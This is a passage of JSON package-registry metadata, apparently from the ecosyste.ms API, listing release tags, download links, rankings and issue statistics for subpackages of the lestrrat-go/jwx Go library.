v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.203Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.082177034635306,"dependent_packages_count":5.700411654884096,"stargazers_count":1.6419083990901688,"forks_count":2.175002106090815,"docker_downloads_count":null,"average":3.8998747986750963},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/internal/json","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/json","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/json","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/internal/json/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fjson/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fjson/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fjson/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fjson/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fjson/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fjson/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415578,"name":"github.com/lestrrat-go/jwx/v2/jwk","ecosystem":"go","description":"Package jwk implements JWK as described in https://tools.ietf.org/html/rfc7517","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":32,"first_release_published_at":"2026-05-09T20:37:32.098Z","latest_release_published_at":"2026-05-09T20:37:32.098Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-09T20:37:39.378Z","created_at":"2026-05-09T20:36:45.444Z","updated_at":"2026-05-09T21:00:30.488Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwk","install_command":"go get github.com/lestrrat-go/jwx/v2/jwk","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwk#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:46.604Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415573,"name":"github.com/lestrrat-go/jwx/jwa","ecosystem":"go","description":"Package jwa defines the various algorithm described in https://tools.ietf.org/html/rfc7518","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx","versions_count":50,"first_release_published_at":"2026-05-09T20:37:56.168Z","latest_release_published_at":"2026-05-09T20:37:56.168Z","latest_release_number":"v1.2.31","last_synced_at":"2026-05-09T20:37:57.686Z","created_at":"2026-05-09T20:36:43.094Z","updated_at":"2026-05-09T21:00:29.323Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwa","install_command":"go get github.com/lestrrat-go/jwx/jwa","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwa#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:44.884Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jwa","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwa","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwa","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jwa/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415572,"name":"github.com/lestrrat-go/jwx/internal/pool","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/internal","versions_count":50,"first_release_published_at":"2026-05-09T20:37:58.879Z","latest_release_published_at":"2026-05-09T20:37:58.879Z","latest_release_number":"v1.2.31","last_synced_at":"2026-05-09T20:38:00.589Z","created_at":"2026-05-09T20:36:42.866Z","updated_at":"2026-05-09T21:00:28.868Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/pool","install_command":"go get github.com/lestrrat-go/jwx/internal/pool","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/pool#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:45.764Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/internal/pool","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/pool","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/pool","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/internal/pool/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fpool/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fpool/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fpool/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fpool/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fpool/related_packages","codemeta_url":"https://packages.ecosyste.ms/a